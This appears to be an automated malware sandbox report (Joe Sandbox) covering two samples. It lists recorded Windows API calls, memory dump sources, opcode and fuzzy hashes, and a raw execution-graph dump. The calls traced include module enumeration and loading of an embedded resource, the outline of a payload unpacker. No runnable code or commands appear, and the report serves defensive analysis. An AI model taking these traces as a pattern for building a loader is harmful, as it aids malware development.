                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B283C2), ref: 02B283A4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                  • String ID: FlushInstructionCache$Kernel32
                                                                                                                  • API String ID: 3811539418-184458249
                                                                                                                  • Opcode ID: 784adca8a7e384750a369b37498409c999472911133d5b67b57caf007e2d1212
                                                                                                                  • Instruction ID: 616b8a28569c6041a2362061019d9ee7c4397ed36f089c6be7e56f977986e096
                                                                                                                  • Opcode Fuzzy Hash: 784adca8a7e384750a369b37498409c999472911133d5b67b57caf007e2d1212
                                                                                                                  • Instruction Fuzzy Hash: F2016DB1654304AFEB00EFA4DD41F5A77EDE708B40FA184A0F908D7650DA74AD159A29
                                                                                                                  APIs
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2AF58
                                                                                                                  • IsBadWritePtr.KERNEL32(?,00000004), ref: 02B2AF88
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000008), ref: 02B2AFA7
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2AFB3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Read$Write
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3448952669-0
                                                                                                                  • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                  • Instruction ID: 3db4d0fc2c1fb154ba514444d524e1075af158aa2dd4818251ed6f8d859da57b
                                                                                                                  • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                  • Instruction Fuzzy Hash: EC2184B264072A9BDB10DF69CCC0BAE77A9EF44351F004591FD18D7384E738E9158AA4

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:12.6%
                                                                                                                  Dynamic/Decrypted Code Coverage:78.7%
                                                                                                                  Signature Coverage:24.2%
                                                                                                                  Total number of Nodes:801
                                                                                                                  Total number of Limit Nodes:48
55285->55284 55288 29c460d9 55286->55288 55289 29c45fd9 55286->55289 55287 29c45fe5 55287->55257 55288->55257 55289->55287 55304 29c46220 55289->55304 55307 29c4621f 55289->55307 55290 29c46025 55293 29b58669 GetModuleHandleW 55290->55293 55294 29b58678 GetModuleHandleW 55290->55294 55293->55288 55294->55288 55297 29c45fd9 55295->55297 55299 29c460d9 55295->55299 55296 29c45fe5 55296->55257 55297->55296 55300 29c46220 2 API calls 55297->55300 55301 29c4621f 2 API calls 55297->55301 55298 29c46025 55302 29b58669 GetModuleHandleW 55298->55302 55303 29b58678 GetModuleHandleW 55298->55303 55299->55257 55300->55298 55301->55298 55302->55299 55303->55299 55305 29c4622a 55304->55305 55310 29c46251 55304->55310 55305->55290 55309 29c46251 2 API calls 55307->55309 55308 29c4622a 55308->55290 55309->55308 55311 29c46271 55310->55311 55313 29c4628c 55310->55313 55315 29b577cc GetModuleHandleW 55311->55315 55316 29b590d9 GetModuleHandleW 55311->55316 55312 29c4627c 55312->55313 55314 29c46251 GetModuleHandleW GetModuleHandleW 55312->55314 55313->55305 55314->55313 55315->55312 55316->55312 55318 29c4b6b8 DispatchMessageW 55317->55318 55319 29c4b745 55318->55319 55319->55229

Control-flow Graph (graph data omitted; starts at node 0: 4019f0-401ac7; legend: Executed, Not Executed)
                                                                                                                  APIs
                                                                                                                  • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                  • _getenv.LIBCMT ref: 00401ABA
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                  • Module32First.KERNEL32 ref: 00401C48
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                  • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                  • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                  • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                  • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                  • _malloc.LIBCMT ref: 00401EBA
                                                                                                                  • _memset.LIBCMT ref: 00401EDD
                                                                                                                  • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                  • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                  • API String ID: 1430744539-2962942730

Control-flow Graph (graph data omitted; starts at node 1739: 28dfe660-28dfe68f; legend: Executed, Not Executed)
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2543136434.0000000028DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28DF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_28df0000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bfd7dda4d01a9b7c8f192464ed836aa0f9f69bc2ed5e824d9fb9306adc1bedc0
                                                                                                                  • Instruction ID: bc4ab3188e6a3d0bfae37cab9ce55377872d8c351eabd5b1ea5064f7bc32159c
                                                                                                                  • Opcode Fuzzy Hash: bfd7dda4d01a9b7c8f192464ed836aa0f9f69bc2ed5e824d9fb9306adc1bedc0
                                                                                                                  • Instruction Fuzzy Hash: 94F1AD74E01228CFDB64DFA9C894B9EBBB2BF98300F1081AAD509A7350DB355E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a5804b6dabb70c994095bded3f070dcf9d263e64cf58b5803633b2026058768d
                                                                                                                  • Instruction ID: 3218b2674aa8abfa4f179fe2097df46c57d1b97d414355bcea9989d008a09c18
                                                                                                                  • Opcode Fuzzy Hash: a5804b6dabb70c994095bded3f070dcf9d263e64cf58b5803633b2026058768d
                                                                                                                  • Instruction Fuzzy Hash: 6BF1AD74E01228CFDB64DFA9C884B9EBBB2BF99300F1081AAD549A7350DB355E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c897148dabc76b6c35fb3ecd0fba94acabe14f9ef8b8b798beb3bf0f1dfc0fb3
                                                                                                                  • Instruction ID: 6e8e04d5d77c4a17257615bc02928fecfa38021dc4827690b59250e2b05dfdd5
                                                                                                                  • Opcode Fuzzy Hash: c897148dabc76b6c35fb3ecd0fba94acabe14f9ef8b8b798beb3bf0f1dfc0fb3
                                                                                                                  • Instruction Fuzzy Hash: 9AF19D74E01228CFDB64DFA9C884B9EBBB2BF98300F1081AAD509A7350DB355E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a49105865beddbbe24cbf88b60b21040a601cff976a7777c84253329905787f3
                                                                                                                  • Instruction ID: 563b336925ac72d09c142d43753be7d5ab8a0638e00eb675d5c23a0a45f3af59
                                                                                                                  • Opcode Fuzzy Hash: a49105865beddbbe24cbf88b60b21040a601cff976a7777c84253329905787f3
                                                                                                                  • Instruction Fuzzy Hash: A4F1BE74E01228CFEB64DFA9C884B9DBBB2BF88300F5081AAD509A7350DB355E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a1a31ec85d4e44ee9439643d229ed35178eb72522bf457ab560f3951b9559970
                                                                                                                  • Instruction ID: d005e226db8feb63a370e7cb383deb5a36db8de3630a1e46abe57f92cd4e0b60
                                                                                                                  • Opcode Fuzzy Hash: a1a31ec85d4e44ee9439643d229ed35178eb72522bf457ab560f3951b9559970
                                                                                                                  • Instruction Fuzzy Hash: B8F19D74E01228CFDB64DFA9C884B9EBBB2BF99300F1081AAD549A7350DB355E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a2e40030148d49801a8e7ee6d2ea79ef4e8ab5f07e51eb471421834fd82b6fe2
                                                                                                                  • Instruction ID: 88e0d1fbbbf4dd30ed1fd1b4922b3469d3a6f4a06dad6cad1a00d735b458ae35
                                                                                                                  • Opcode Fuzzy Hash: a2e40030148d49801a8e7ee6d2ea79ef4e8ab5f07e51eb471421834fd82b6fe2
                                                                                                                  • Instruction Fuzzy Hash: EAF1AD74E01228CFDB64DFA9C894B9EBBB2BF99300F1081AAD509A7350DB355E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 09dd836c99abb54467788f5e98f8c4d57ab75795a68e33d83cd441366cbd533b
                                                                                                                  • Instruction ID: d08552c639d29116eef284a6e3a5e11948af27a72dcfda4c876a91ebefda0e16
                                                                                                                  • Opcode Fuzzy Hash: 09dd836c99abb54467788f5e98f8c4d57ab75795a68e33d83cd441366cbd533b
                                                                                                                  • Instruction Fuzzy Hash: 63F1AC74E01228CFDB64DFA9C884B9EBBB2BF99300F5081AAD509A7350DB355E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ffc8ead3204a3481c8c1e1c208387a32bb6dcb9e95a0c3e66f56e98c7c5e722a
                                                                                                                  • Instruction ID: 5b9bc13f7bc972c93e7a270f74405f79d8c6c1174579321752eed6e1c96266ab
                                                                                                                  • Opcode Fuzzy Hash: ffc8ead3204a3481c8c1e1c208387a32bb6dcb9e95a0c3e66f56e98c7c5e722a
                                                                                                                  • Instruction Fuzzy Hash: 49F1AD74E01228CFDB64DFA9C884B9EBBB2BF99300F1081AAD549A7350DB355E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: da2dd5cda5a9d34cb008c1cc0e48dd578401de2b98c9edbad28419521044fd08
                                                                                                                  • Instruction ID: c48319be05b8fc1a01df63daeebea6f5b95eff586eb33f4a4f7ad3aae650e144
                                                                                                                  • Opcode Fuzzy Hash: da2dd5cda5a9d34cb008c1cc0e48dd578401de2b98c9edbad28419521044fd08
                                                                                                                  • Instruction Fuzzy Hash: 5BF1AF74E01228CFDB64DFA9C884B9DBBB2BF59300F1081AAD549A7350DB359E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b2ededfa524d3c883f2eb347c9193b81a0e3b2a084bb6a6cd3c727af5f7e7924
                                                                                                                  • Instruction ID: 6d58d3c60d8a5d6403efeee5688b5a185958127d73860c418b9e36b7a93bbd81
                                                                                                                  • Opcode Fuzzy Hash: b2ededfa524d3c883f2eb347c9193b81a0e3b2a084bb6a6cd3c727af5f7e7924
                                                                                                                  • Instruction Fuzzy Hash: 18F19D74E01228CFDB64DFA9C884B9EBBB2BF99300F5081AAD509A7350DB355E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ac625902cc30727f9c1c3ab4b0ad1fb3647cd2e82fa679c7e48175d481624a35
                                                                                                                  • Instruction ID: 94e7be709c69f7b82cc3c01b6f778a2fe708c33fa0ee1a584d390435d7c87637
                                                                                                                  • Opcode Fuzzy Hash: ac625902cc30727f9c1c3ab4b0ad1fb3647cd2e82fa679c7e48175d481624a35
                                                                                                                  • Instruction Fuzzy Hash: 44F19D74E01228CFDB64DFA9C894B9EBBB2BF99300F1081AAD509A7350DB355E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 897877e2a69f70103da1b85a90f916a4f80a4a937fb4e6f453b66c720428bd7e
                                                                                                                  • Instruction ID: 39c4e637ecc471db58d294c0589090492f397af3a245aa1651438e47e33bd903
                                                                                                                  • Opcode Fuzzy Hash: 897877e2a69f70103da1b85a90f916a4f80a4a937fb4e6f453b66c720428bd7e
                                                                                                                  • Instruction Fuzzy Hash: C0F19D74E01228CFDB64DFA9C884B9DBBB2BF99300F1081AAD509A7350DB355E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d0e568b0b83ff276a56bd3dca92a57c301f6d57d7e733f00c6b8505ca275090b
                                                                                                                  • Instruction ID: 1578c99b65921f572600f357391744e0269e1a7f52e1de239ada29f23f206923
                                                                                                                  • Opcode Fuzzy Hash: d0e568b0b83ff276a56bd3dca92a57c301f6d57d7e733f00c6b8505ca275090b
                                                                                                                  • Instruction Fuzzy Hash: 94F1AD74E01228CFDB64DFA9C894B9EBBB2BF99300F1081AAD509A7350DB355E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3a55c2deea43a348f93e07787a619e17c21c30add563e94bff6400e73111c9d0
                                                                                                                  • Instruction ID: dab3723b0dbc2956bcbdd24217f2cfb403e94387ecb75d4ee589264be41b411f
                                                                                                                  • Opcode Fuzzy Hash: 3a55c2deea43a348f93e07787a619e17c21c30add563e94bff6400e73111c9d0
                                                                                                                  • Instruction Fuzzy Hash: F3F1BD74E01228CFDB64DFA9C890B9EBBB2BF98300F1081AAD509A7350DB355E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f31d807ff5559f55fbe562d9de2017ac348b1346591d97dc23d9f2d38da935f0
                                                                                                                  • Instruction ID: c8e505cfcf24016d23a53333b88b5c6fcb70f044bd70fa2a097efcbf20e7d152
                                                                                                                  • Opcode Fuzzy Hash: f31d807ff5559f55fbe562d9de2017ac348b1346591d97dc23d9f2d38da935f0
                                                                                                                  • Instruction Fuzzy Hash: 5AF1BE74E01228CFEB64DFA5C884B9DBBB2BF98300F5081AAD509A7350DB355E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3a6274bf84e962fe0cc3e96d84c6748eed0a8c303558c02bf83697f6eed3b7cf
                                                                                                                  • Instruction ID: 728620dde597fc3432a9e396ca227bb5ed5f72426c29aadb6b6813ecb95b4783
                                                                                                                  • Opcode Fuzzy Hash: 3a6274bf84e962fe0cc3e96d84c6748eed0a8c303558c02bf83697f6eed3b7cf
                                                                                                                  • Instruction Fuzzy Hash: D0F1CE74E01228CFDB64DFA9C884B9DBBB2BF98300F5081AAD809A7350DB355E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a730288132bddaac1f585a0b8e808f2476a384786dd7b5029e72d6a40067857d
                                                                                                                  • Instruction ID: 78f9f44effdbd67356059dbe6c973f0a29b2ffcdda66a380ff85ef6c37f8a0e8
                                                                                                                  • Opcode Fuzzy Hash: a730288132bddaac1f585a0b8e808f2476a384786dd7b5029e72d6a40067857d
                                                                                                                  • Instruction Fuzzy Hash: 88F1AC74E01228CFEB64DFA9C884B9DBBB2BF98300F5081AAD509A7350DB355E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 085768141e19ab008866eecdfc8111a5a4ded9255f9c67d1f520f0ff624e9949
                                                                                                                  • Instruction ID: 4e9278b42d8ce5d3d5ecb136b41cc39d8d5684cbb9bbe61277d13f1f36f292c1
                                                                                                                  • Opcode Fuzzy Hash: 085768141e19ab008866eecdfc8111a5a4ded9255f9c67d1f520f0ff624e9949
                                                                                                                  • Instruction Fuzzy Hash: 6FF19E78E01228CFDB64DFA9C894B9DBBB2BF98300F1081AAD549A7350DB345E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e0ddf69d98bd42097091897afed3747c3ddd0c2d2144d9168316c44ae3a15f5f
                                                                                                                  • Instruction ID: 1ce17ac7637d5aefbbc36fccfe26f4e295445ecedddf899894fb10a7d4fb76cc
                                                                                                                  • Opcode Fuzzy Hash: e0ddf69d98bd42097091897afed3747c3ddd0c2d2144d9168316c44ae3a15f5f
                                                                                                                  • Instruction Fuzzy Hash: C5F1AF74E01228CFDB64DFA9C884B9DBBB2BF99300F5081AAD909A7350DB355E85DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 62f956a26ffd8d888414566ee34caa91ee975708abdd5740f958a21153daf525
                                                                                                                  • Instruction ID: 1c3ce5801c019e117067c5c555a4aee8f9daa605e582858e8b151ed7fa1c329e
                                                                                                                  • Opcode Fuzzy Hash: 62f956a26ffd8d888414566ee34caa91ee975708abdd5740f958a21153daf525
                                                                                                                  • Instruction Fuzzy Hash: E4B11571D006598FDB14DFA9C844B9DFBB1FF89310F10C2AAD448AB265EB709A85CF85
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9b2baa925ac2705a77502838524540c5ce195933e3b2ffcaa98abbbe7c838887
                                                                                                                  • Instruction ID: e4313f69cbce103fec8176aee4eaa7a48783e8892b9cbd744338e6c7537d6fc5
                                                                                                                  • Opcode Fuzzy Hash: 9b2baa925ac2705a77502838524540c5ce195933e3b2ffcaa98abbbe7c838887
                                                                                                                  • Instruction Fuzzy Hash: 2BB1B475E01218CFEB64CF6AC944B9EBBF2AF89310F10C0EAD549A7254DB345A85CF51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 652f75dce9964bbb59127590b59c2af68c092d77fd250d57e1afd39f2a2c59f9
                                                                                                                  • Instruction ID: a641142a806972910cf69c4d239cfd58b82ebf8c6d51d46b60bee6a032478c3b
                                                                                                                  • Opcode Fuzzy Hash: 652f75dce9964bbb59127590b59c2af68c092d77fd250d57e1afd39f2a2c59f9
                                                                                                                  • Instruction Fuzzy Hash: F5B1B474E012288FEB64CF6AC944B9EBBF2BF89300F14C0EAD449A7254DB745A85CF51
